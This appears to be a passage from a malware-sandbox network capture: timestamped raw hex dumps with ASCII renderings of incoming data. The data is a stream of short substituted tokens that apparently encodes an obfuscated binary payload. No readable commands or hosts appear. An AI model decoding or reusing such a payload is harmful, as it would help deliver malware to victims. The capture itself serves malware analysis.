                                                                                                2021-10-26 15:35:18 UTC8058INData Raw: 20 70 50 20 53 20 70 50 20 53 20 55 67 20 53 20 70 50 20 53 20 70 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 6e 6e 20 53 20 69 55 20 53 20 70 70 20 53 20 4f 53 20 53 20 55 54 20 53 20 55 70 20 53 20 54 53 69 20 53 20 55 54 20 53 20 55 54 20 53 20 55 70 20 53 20 54 53 69 20 53 20 70 50 20 53 20 55 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 70 50 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 53 20 53 20 50 53 20 53 20 6e 55 20 53 20 54 4d 4d 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 6e 55 20 53 20 54 54 70 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 4f 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 54 54 70 20 53 20 55 4f 20 53 20 55 6e 20 53 20 54 4d 53 20 53 20 54 54 50 20 53 20 4f 55 20 53 20 50 53 20
                                                                                                Data Ascii: pP S pP S Ug S pP S pU S Pp S in S nn S iU S pp S OS S UT S Up S TSi S UT S UT S Up S TSi S pP S Un S TSg S pP S pP S nP S pP S ni S TSM S TSS S PS S nU S TMM S On S Un S nU S TTp S OO S pP S pP S pP S iO S TTO S ni S TTp S UO S Un S TMS S TTP S OU S PS
                                                                                                2021-10-26 15:35:18 UTC8074INData Raw: 54 53 20 53 20 55 54 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 70 70 20 53 20 6e 53 20 53 20 4f 55 20 53 20 54 53 4f 20 53 20 6e 53 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 6e 54 20 53 20 55 70 20 53 20 55 55 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 50 67 20 53 20 54 53 6e 20 53 20 4f 55 20 53 20 50 54 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 54 54 54 20 53 20 70 70 20 53 20 55 69 20 53 20 55 6e 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 55 70 20 53 20 50 53 20 53 20 54 53 55 20 53 20 54 54 6e 20 53 20 4f 53 20 53 20 6e 54 20 53 20 50 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 54 20 53 20 50 6e 20 53 20 54 54 4d 20 53 20 4f 55 20 53 20 54 54 53 20 53 20 55 4d 20 53 20 54 4d 4d 20 53 20 70 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: TS S UT S pP S TMS S pP S pp S nS S OU S TSO S nS S TSP S OU S nT S Up S UU S On S Un S Pg S TSn S OU S PT S OO S pP S pP S nU S TTT S pp S Ui S Un S nS S TTO S Up S PS S TSU S TTn S OS S nT S Pn S PT S UP S nT S Pn S TTM S OU S TTS S UM S TMM S pP S pP S
                                                                                                2021-10-26 15:35:18 UTC8090INData Raw: 20 53 20 54 54 4f 20 53 20 70 6e 20 53 20 70 50 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 70 50 20 53 20 70 55 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 6e 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 70 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 6e 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 50 20 53 20 54 54 50 20 53 20 70 50 20 53 20 70 50 20
                                                                                                Data Ascii: S TTO S pn S pP S ni S TTO S pP S pP S pP S US S pP S pU S pP S ng S pP S TTT S pP S pP S pP S pP S pn S pP S UT S pP S TSg S pn S TSn S pP S pP S pP S pP S TSg S pp S pP S pn S pP S nP S TSg S pP S pP S pP S pU S TSg S pO S pP S ng S pP S TTP S pP S pP
                                                                                                2021-10-26 15:35:18 UTC8106INData Raw: 4f 20 53 20 55 4f 20 53 20 70 4f 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 55 4f 20 53 20 70 4f 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50
                                                                                                Data Ascii: O S UO S pO S TSg S TTO S UO S pO S TSg S TTO S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP
                                                                                                2021-10-26 15:35:18 UTC8122INData Raw: 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 67 20 53 20 4f 55 20 53 20 6e 4f 20 53 20 6e 4f 20 53 20 55 54 20 53 20 6e 67 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 70 20 53 20 70 50 20 53 20 50 50 20 53 20 6e 54 20 53 20 55
                                                                                                Data Ascii: S pP S pP S pP S pP S pP S pP S pP S pP S TTg S OU S nO S nO S UT S ng S pp S UT S pP S pP S pP S pP S in S in S Pp S pP S in S in S Pp S pP S in S in S Pp S pP S in S in S Pp S pP S in S in S Pp S pP S in S in S Pp S pP S in S in S Pp S pP S PP S nT S U
                                                                                                2021-10-26 15:35:18 UTC8138INData Raw: 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70
                                                                                                Data Ascii: P S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S p
                                                                                                2021-10-26 15:35:18 UTC8154INData Raw: 6e 20 53 20 54 4d 53 20 53 20 54 53 53 20 53 20 6e 4d 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 4f 4f 20 53 20 55 55 20 53 20 55 4d 20 53 20 50 4d 20 53 20 69 6e 20 53 20 50 54 20 53 20 6e 53 20 53 20 69 55 20 53 20 54 53 54 20 53 20 55 53 20 53 20 50 6e 20 53 20 54 4d 53 20 53 20 54 53 53 20 53 20 6e 4d 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 54 54 55 20 53 20 6e 6e 20 53 20 55 55 20 53 20 55 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 70 20 53 20 50 54 20 53 20 54 54 55 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 55 20 53 20 50 6e 20 53 20 4f 55 20 53 20 4f 55 20 53 20 69 6e 20 53 20 50 69 20 53 20 6e 4f 20 53 20 70 55 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 54 53
                                                                                                Data Ascii: n S TMS S TSS S nM S TSp S in S OO S UU S UM S PM S in S PT S nS S iU S TST S US S Pn S TMS S TSS S nM S TSp S in S TTU S nn S UU S UP S in S in S in S in S in S in S in S Up S PT S TTU S pU S in S iU S Pn S OU S OU S in S Pi S nO S pU S pP S US S Pn S TS
                                                                                                2021-10-26 15:35:18 UTC8170INData Raw: 6e 54 20 53 20 54 53 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 69 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70
                                                                                                Data Ascii: nT S TSO S UT S pP S pP S pP S pP S pU S UT S pP S pP S pP S pP S pU S TSg S pP S pP S pP S nM S TTO S pP S pP S pP S pp S in S pP S pP S pP S pP S US S TTO S pP S pP S pP S pU S Pp S pP S pP S pP S pP S UT S pP S pP S pP S pP S pP S pP S pP S pP S pP S p
                                                                                                2021-10-26 15:35:18 UTC8186INData Raw: 70 50 20 53 20 4f 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 69 20 53 20 70 50 20 53 20 70 4f 20 53 20 55 4f 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 55 20 53 20 4f 53 20 53 20 54 54 4f 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 70 4f 20 53 20 50 70 20 53 20 70 50 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 54 6e 20 53 20 70 50 20 53 20 6e 4d 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 55 4f 20 53 20 70 50 20 53 20 55 67 20 53 20
                                                                                                Data Ascii: pP S On S pP S pP S ni S pP S pO S UO S pP S nU S UT S pP S pP S pP S pP S pP S pP S UU S OS S TTO S TSO S pP S pO S Pp S pP S OO S pP S pp S iU S pP S nT S TSn S pP S OU S TTO S pp S TTn S pP S nM S nn S pP S pP S pP S pn S UT S pP S pn S UO S pP S Ug S
                                                                                                2021-10-26 15:35:18 UTC8202INData Raw: 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 55 54 20 53 20 50 4d 20 53 20 54 53 67 20 53 20 6e 53 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 70 70 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 55 20 53 20 54 53 67 20 53 20 70 55 20 53 20 50 53 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 50 4d 20 53 20 70 50 20 53 20 6e 70 20 53 20 54 53 67 20 53 20 70 50 20 53 20 54 54 6e 20 53 20
                                                                                                Data Ascii: P S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S nS S UT S PM S TSg S nS S TTM S pP S pp S nn S pP S pU S TSg S pU S PS S pP S TTO S pP S pP S in S in S ig S pP S pP S pn S PM S pP S np S TSg S pP S TTn S
                                                                                                2021-10-26 15:35:18 UTC8218INData Raw: 4f 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 53 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 69 20 53 20 55 54 20 53 20 54 53 50 20 53 20 70 70 20 53 20 55 50 20 53 20 70 50 20 53 20 55 50 20 53 20 70 50 20 53 20 70 70 20 53 20 70 50 20 53 20 70 6e 20 53 20 54 4d 4d 20 53 20 70 50 20 53 20 4f 53 20 53 20 50 4d 20 53 20 70 50 20 53 20 4f 53 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 6e 6e 20 53 20 70 50 20 53 20 54 53 54 20 53 20 55 54 20 53 20
                                                                                                Data Ascii: O S TTO S pp S TSU S pP S nT S TTO S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S Ui S UT S TSP S pp S UP S pP S UP S pP S pp S pP S pn S TMM S pP S OS S PM S pP S OS S UT S pP S pP S pP S nS S nn S pP S TST S UT S
                                                                                                2021-10-26 15:35:18 UTC8234INData Raw: 6e 67 20 53 20 70 50 20 53 20 70 70 20 53 20 54 53 4f 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 50 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 70 20 53 20 70 50 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 70 70 20 53 20 54 54 4d 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 4f 53 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 54 20 53 20 55 50 20 53 20 70 50 20 53 20 4f 55 20 53 20 54 53 67 20 53 20 70 70 20 53 20 50 53 20 53 20 70 50 20 53 20 6e 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 4f 4f 20 53 20 54 53 67 20 53 20 70 70 20 53 20 54 54 55 20 53 20 70 50 20 53 20 6e 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 4f 55 20 53
                                                                                                Data Ascii: ng S pP S pp S TSO S pP S nT S Pp S pP S OU S pP S pp S TTP S pP S nT S Pp S pP S TSS S TTO S pp S TTM S pP S nT S PM S pP S OS S TTO S pP S TSg S pP S nT S UP S pP S OU S TSg S pp S PS S pP S nT S TSn S pP S OO S TSg S pp S TTU S pP S nT S PM S pP S OU S
                                                                                                2021-10-26 15:35:18 UTC8250INData Raw: 53 69 20 53 20 4f 4f 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 53 20 53 20 6e 6e 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 6e 4d 20 53 20 70 70 20 53 20 54 54 50 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 6e 54 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 4f 55 20 53 20 54 53 70 20 53 20 50 4d 20 53 20 6e 55 20 53 20 70 6e 20 53 20 54 53 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 6e 67 20 53 20 70 6e 20 53 20 70 50 20 53 20 50 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 6e 55 20 53 20 54 54 70 20 53 20 54 53 53 20 53 20 54 53 70 20 53 20 6e 6e 20 53 20 50 69 20 53 20 54 53 53 20 53 20 50 53 20 53 20 54 53 55 20 53 20 54 54 6e 20 53 20 4f 53 20 53 20 6e 54 20 53 20 50 6e 20
                                                                                                Data Ascii: Si S OO S PS S iO S PS S nn S TMM S TTM S TSi S OO S nM S pp S TTP S On S Un S nU S TSi S TSS S nT S TSU S TTU S OU S TSp S PM S nU S pn S TSP S pP S TSg S ng S pn S pP S Pp S UO S UU S nU S TTp S TSS S TSp S nn S Pi S TSS S PS S TSU S TTn S OS S nT S Pn
                                                                                                2021-10-26 15:35:18 UTC8266INData Raw: 55 20 53 20 50 50 20 53 20 4f 6e 20 53 20 69 4f 20 53 20 54 53 55 20 53 20 50 50 20 53 20 70 70 20 53 20 54 4d 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 54 54 6e 20 53 20 55 6e 20 53 20 70 6e 20 53 20 50 53 20 53 20 50 54 20 53 20 4f 6e 20 53 20 50 50 20 53 20 6e 70 20 53 20 55 70 20 53 20 55 4d 20 53 20 6e 6e 20 53 20 55 6e 20 53 20 55 70 20 53 20 54 54 54 20 53 20 69 4f 20 53 20 54 54 55 20 53 20 50 53 20 53 20 54 54 4f 20 53 20 4f 4f 20 53 20 55 70 20 53 20 50 69 20 53 20 50 53 20 53 20 54 54 53 20 53 20 54 54 55 20 53 20 6e 6e 20 53 20 6e 67 20 53 20 54 4d 54 20 53 20 54 53 69 20 53 20 55 67 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 54 53 69 20 53 20 54 54 4d 20 53 20 6e 55 20 53 20 50 4d 20 53 20 54 53 67 20 53 20 54 54 50 20 53 20 50 54 20 53
                                                                                                Data Ascii: U S PP S On S iO S TSU S PP S pp S TMS S TTU S US S TTn S Un S pn S PS S PT S On S PP S np S Up S UM S nn S Un S Up S TTT S iO S TTU S PS S TTO S OO S Up S Pi S PS S TTS S TTU S nn S ng S TMT S TSi S Ug S TMM S TTU S TSi S TTM S nU S PM S TSg S TTP S PT S
                                                                                                2021-10-26 15:35:18 UTC8282INData Raw: 70 4f 20 53 20 70 70 20 53 20 6e 6e 20 53 20 70 55 20 53 20 70 4f 20 53 20 54 54 4f 20 53 20 70 55 20 53 20 55 54 20 53 20 55 4f 20 53 20 6e 69 20 53 20 55 4f 20 53 20 6e 67 20 53 20 4f 53 20 53 20 6e 67 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 50 20 53 20 70 55 20 53 20 70 70 20 53 20 70 50 20 53 20 6e 67 20 53 20 70 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 4f 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 70 4f 20 53 20 54 53 69 20 53 20 54 53 67 20 53 20 6e 53 20 53 20 54 54 4f 20 53 20 54 54 70 20 53 20 54 54 55 20 53 20 50 70 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 6e 6e 20 53 20 54 53 70 20 53 20 54 53 4f 20 53 20 54 53 54 20 53 20 54 54 67 20 53 20 50 54 20 53 20 69 6e 20 53 20 70 4f 20 53 20 55 4f 20 53 20 4f 53 20 53 20 55 70 20 53
                                                                                                Data Ascii: pO S pp S nn S pU S pO S TTO S pU S UT S UO S ni S UO S ng S OS S ng S pP S Un S UP S pU S pp S pP S ng S pp S pp S UT S pP S pO S ng S nO S pO S TSi S TSg S nS S TTO S TTp S TTU S Pp S OO S TTn S nn S TSp S TSO S TST S TTg S PT S in S pO S UO S OS S Up S
                                                                                                2021-10-26 15:35:18 UTC8298INData Raw: 4f 20 53 20 4f 55 20 53 20 50 54 20 53 20 6e 69 20 53 20 54 53 6e 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 54 53 67 20 53 20 54 54 4f 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 55 4f 20 53 20 70 55 20 53 20 55 70 20 53 20 55 54 20 53 20 55 54 20 53 20 6e 50 20 53 20 70 4f 20 53 20 54 54 4f 20 53 20 50 6e 20 53 20 55 69 20 53 20 4f 53 20 53 20 55 6e 20 53 20 6e 55 20 53 20 69 55 20 53 20 4f 6e 20 53 20 55 6e 20 53 20 54 53 53 20 53 20 54 54 55 20 53 20 6e 67 20 53 20 70 4f 20 53 20 54 4d 53 20 53 20 54 54 4d 20 53 20 4f 55 20 53 20 55 6e 20 53 20 54 53 55 20 53 20 69 55 20 53 20 4f 53 20 53 20 55 6e 20 53 20 55 54 20 53 20 54 4d 53 20 53 20 6e 69 20 53 20 55 69 20 53 20 70 50 20 53 20 54 53 70 20 53 20 70 70 20 53 20 54 53 67 20 53 20 6e 55 20 53 20 55 70 20
                                                                                                Data Ascii: O S OU S PT S ni S TSn S nn S UM S TSg S TTO S nS S TSg S UO S pU S Up S UT S UT S nP S pO S TTO S Pn S Ui S OS S Un S nU S iU S On S Un S TSS S TTU S ng S pO S TMS S TTM S OU S Un S TSU S iU S OS S Un S UT S TMS S ni S Ui S pP S TSp S pp S TSg S nU S Up
                                                                                                2021-10-26 15:35:18 UTC8314INData Raw: 20 4f 53 20 53 20 6e 4d 20 53 20 54 53 69 20 53 20 4f 6e 20 53 20 50 54 20 53 20 54 54 54 20 53 20 54 4d 53 20 53 20 54 54 55 20 53 20 54 54 53 20 53 20 6e 4f 20 53 20 54 53 54 20 53 20 50 70 20 53 20 55 4f 20 53 20 55 70 20 53 20 69 67 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 4d 20 53 20 54 54 69 20 53 20 54 53 50 20 53 20 50 54 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 54 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 69 20 53 20 50 50 20 53 20 70 70 20 53 20 55 50 20 53 20 54 53 6e 20 53 20 6e 4f 20 53 20 50 69 20 53 20 54 53 67 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 53 69 20 53 20 69 67 20 53 20 54 53 53 20 53 20 54 53 50 20 53 20 70 55 20 53 20 54 53 69 20 53 20 55 70 20 53 20 69 55 20 53 20 54 53 67 20 53 20 54 54 6e 20 53 20 69 4f 20 53 20 54
                                                                                                Data Ascii: OS S nM S TSi S On S PT S TTT S TMS S TTU S TTS S nO S TST S Pp S UO S Up S ig S TSU S OS S PM S TTi S TSP S PT S PM S TSU S nT S pP S nO S Pi S PP S pp S UP S TSn S nO S Pi S TSg S pP S ng S TSi S ig S TSS S TSP S pU S TSi S Up S iU S TSg S TTn S iO S T
                                                                                                2021-10-26 15:35:18 UTC8330INData Raw: 53 20 67 6e 20 53 20 54 67 20 53 20 54 53 20 53 20 67 6e 20 53 20 54 53 6e 20 53 20 54 53 55 20 53 20 54 4d 54 20 53 20 4f 55 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 53 70 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 54 20 53 20 54 4d 53 20 53 20 54 54 6e 20 53 20 4f 55 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 54 53 55 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 54 69 20 53 20 54 53 50 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 54 53 4d 20 53 20 54 54 55 20 53 20 4f 6e 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 54 54 50 20 53 20
                                                                                                Data Ascii: S gn S Tg S TS S gn S TSn S TSU S TMT S OU S gn S TTP S gn S TSp S TMM S TTT S TST S TMS S TTn S OU S TMM S TTM S TSU S gn S OO S gn S TTi S TSP S TSp S OU S gn S gM S gn S TMM S TTn S TSM S TSg S TSi S TST S TSM S TTU S On S TTT S TSO S TSS S gn S TTP S
                                                                                                2021-10-26 15:35:18 UTC8346INData Raw: 20 54 4d 53 20 53 20 4f 55 20 53 20 54 53 4d 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 54 4d 20 53 20 4f 6e 20 53 20 54 54 55 20 53 20 54 4d 54 20 53 20 54 4d 53 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 54 53 70 20 53 20 54 54 69 20 53 20 67 6e 20 53 20 54 67 20 53 20 54 53 20 53 20 67 6e 20 53 20 54 53 54 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 67 6e 20 53 20 54 54 50 20 53 20 67 6e 20 53 20 54 54 70 20 53 20 54 53 70 20 53 20 54 54 4f 20 53 20 4f 4f 20 53 20 54 54 53 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 67 6e 20 53 20 54 4d 53 20 53 20 54 53 70 20 53 20 54 54 67 20 53 20 54 54 55 20 53 20 54 54 69 20 53 20 54 54 6e 20 53 20 54 54 67 20 53 20 54 54 54 20 53 20 54 54
                                                                                                Data Ascii: TMS S OU S TSM S gn S TTP S gn S TTM S On S TTU S TMT S TMS S gn S TTp S gn S TTU S TSp S TTi S gn S Tg S TS S gn S TST S OO S TTn S OO S TTO S gn S TTP S gn S TTp S TSp S TTO S OO S TTS S gn S OO S gn S TMS S TSp S TTg S TTU S TTi S TTn S TTg S TTT S TT
                                                                                                2021-10-26 15:35:18 UTC8362INData Raw: 53 20 54 53 67 20 53 20 54 53 69 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 54 53 67 20 53 20 67 6e 20 53 20 67 4d 20 53 20 67 6e 20 53 20 4f 4f 20 53 20 54 53 4d 20 53 20 54 54 69 20 53 20 54 4d 54 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 54 54 6e 20 53 20 54 53 69 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 54 50 20 53 20 54 54 4d 20 53 20 67 6e 20 53 20 70 50 20 53 20 67 6e 20 53 20 54 53 50 20 53 20 54 54 69 20 53 20 54 54 69 20 53 20 54 53 70 20 53 20 54 53 69 20 53 20 54 4d 53 20 53 20 54 54 69 20 53 20 54 54 70 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 67 6e 20 53 20 54 53 53 20 53 20 67 6e 20 53 20 54 53 6e 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 67 6e 20 53 20 54 54 55 20 53 20 67 6e 20 53 20 54 54 4f 20 53 20 54 54 70 20 53 20 54 54
                                                                                                Data Ascii: S TSg S TSi S TMT S OO S TSg S gn S gM S gn S OO S TSM S TTi S TMT S TSi S OO S TTn S TSi S TSi S TSS S TTP S TTM S gn S pP S gn S TSP S TTi S TTi S TSp S TSi S TMS S TTi S TTp S TTT S TSn S gn S TSS S gn S TSn S TSM S TSM S gn S TTU S gn S TTO S TTp S TT
